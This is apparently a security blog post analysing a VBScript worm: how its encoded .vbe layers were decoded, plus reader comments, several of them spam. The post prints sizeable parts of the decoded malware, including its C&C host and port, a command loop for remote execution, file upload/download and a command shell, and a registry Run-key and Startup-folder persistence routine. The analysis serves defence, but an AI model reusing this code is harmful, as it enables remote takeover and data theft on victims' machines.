(Just in case you're wondering, this sample was detected by a custom HIPS rule looking for suspicious registry modifications. Would definitely recommend deploying custom HIPS rules if you haven't already!)
The Sample
The malware was created using VBScript and saved as a .vbe file. It did a great job of evading AV with a score of only 4/46 on VirusTotal, props to CAT-QuickHeal/Avast/Kaspersky/TrendMicro for detecting it!
I assumed I would be able to just open the file and I'd see the malicious script. Well it wasn't quite that simple...Opening the .vbe all I got was a huge mass of characters:
After a quick Google I found out, VBE stands for VBScript Encoded, (ahhha moment!) and I needed some way to decode the file. Luckily there was a great blog post with sample script here:
Running the decode script against the encoded vbe we get some clear-text vbs.
Hmmm another chunk of encoded text. It does appear to be sent to a function called deCrypt though and looking down the script we come to the actual deCrypt function.
The decrypt function calls decodeBase64 which coverts our data from Base64 to ASCII. Also note that the decrypt routine is ran twice (once in each screenshot) before finally being executed. Now we could write a decode script or we could just use an online converter (http://www.hcidata.info/base64.htm):
Decoding Once (Still garbled...)
Decoding Twice (Woohoo code!)
So we have a variable....but also more encoded text. Scrolling down we come to the decryption routine:
Decryption removes the |dz| padding then for each item in the array concatenates to the previous item the ascii character for that character code. And then executes the final string. To get the plain text script I just patched the existing script to output to file instead of execute.
And finally we get to the actual VBScript:
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "zoia.no-ip.org"
port = 446
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
(Continued below...)
Straight away you notice the author has proudly placed his name and Skype at the top of the script (queue Krebs style investigation!) Next there's the callback domain, where he's using the dynamic DNS service no-ip.org.
When run the script will repeatedly connect to the C&C and attempts to receive commands.
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
Looking at the install routine we can see the script will create run keys and a copy of itself in the startup folder to maintain persistence.
sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub
The script contains multiple functions the C&C owner can call upon. For example to install/uninstall, download/upload files, enumerate/kill processes, run arbitrary commands and spread using lnk files. As I had an infected machine I modified the original script to create a cleaner script that would call the uninstall function.
The malware appears to be quite recent as Googling the plain text script I could see only one post about it. The below link also has a copy of the whole script:
http://social.technet.microsoft.com/Forums/en-US/f80f10c6-ae6c-4f63-96ec-9d49d582764a/virus-acceso-directo-en-discos-extraibles
Final Thoughts
Manual binary analysis can be tricky so I normally let Cuckoo (http://www.cuckoosandbox.org/) do all the hard work but until Cuckoo supports VBScript manual analysis seems to be the only option.
While the malicious script had some great functionality I was surprised how badly it had been obfuscated. In the web app world Javascript obfuscators can be a nightmare, renaming variables, breaking everything up into a million different concatenations and dummy functions. All this script had was a basic encoding routine and some Base64 conversion. Lazy script kiddie maybe?
Hope you guys found this useful.
Pdizzle out.
Haha... Hi. So I came across a similar script recently, it's causing havoc at my school (I.E. A university in South Africa)... at first I thought it was home-grown from one of the IT-labs but I learned otherwise... it's different in that it seems to pre-date yours as the actual VBs file is not encoded.
ReplyDeleteHere are it's First(significant) lines:
****************************************
'< -cyber Crypter ->
t1 = shadows
t1 = hexDecode(t1)
Safa&_22 = deCrypt (t1)
EXECUTE (Safa7_22)
****************************************
Anyway I didn't even bother decrypting (For lack of a better term) the code... I simply let the script do all the work, commented out the Execution and made it output "Safa7_22" to a file. Worked like a charm. The output matches yours except the Host address is different.
Just thought I'd share.
I like the site, InfoSec has been an interest of mine for a while now.
Anyway I'm out.
Hi! Thanks for this wonderful tutorial.
ReplyDeleteThis is one of the easiest way I've seen to decrypt Houdini worm.
Anyways, regarding the initial encoded script,
an easier way to decode can be to replace "EXECUTE(Safa7_22)" with
Set fso = CreateObject ("Scripting.FileSystemObject")
Set stdout = fso.CreateTextFile("output.txt")
stdout.Writeline Safa7_22
output.txt will now contain the script with "DZCLOVER".
Very good blog, by the way :)
@Tumi - We had the same issue that it was spreading across multiple machines. There are a number of different mitigations, you can try submitting a sample to your AV vendor, implementing HIPS rules to block file/registry creation and access or proxy/firewall rules to block and detect the callbacks. Restricting USB is also recommended although not always possible.
ReplyDelete@Anthony - Thanks for the decrypt shortcut + comments!
Very good article I like it, there are not many tutorials about deobfuscating encoded .vbs files. Can you help me to deobfuscate a malicious .vbs? I have problems with it...
ReplyDeleteThanks John, have you got a link where I can view the code?
ReplyDeleteThank you for your prompt reply. You can send me an email at admin(at)cleanbytes.net with your email and I can send the file in an email attachment. You can see there the article about that vbs malware: http://cleanbytes.net/vbscript-shortcuts-virus-removal and I am eager to see what it really contains. Thank you again for your time.
ReplyDeleteI also found this malware on my friend Claudia's Flash Drive (a bit late though) and couldn't resist the temptation to let it be my first malware reverse engineered. Was like a soft massage to my brain, a great entertainment to spend a couple of hours on. Dear old VB6... Thank you all for sharing this info. Now I'm going to treat this file differently.
ReplyDeleteimpressive coding skills
ReplyDeleteappvn download
tutuapp apk ios
Thank you for this great post
ReplyDeleteclipping path service|Photo Retouching services|Vector Tracing
school fees management system
ReplyDeleteschool billing software
school management solution
educational management software
Hi...
ReplyDeleteHow not to Obfuscate your VBScript. I recently came across a malware ... The malware was created using VBScript and saved as a .vbe file.
You are also read more Affordable Housing Loan
An AWS cloud draftsman is an expert who can evaluate a business' requirements and make design suggestions for executing and really conveying applications on AWS. An AWS cloud framework draftsman is an IT master who directs a business' distributed computing climate which incorporates the administration of utilization engineering and its organization in a cloud-based biological system. AWS cloud modeler jobs and obligations incorporate cloud reception and application plan and cloud organization and checking. AWS cloud specialists ought to have the authority AWS Certificate from Amazon which approves their cloud mastery>> cloud architecture engineer
ReplyDelete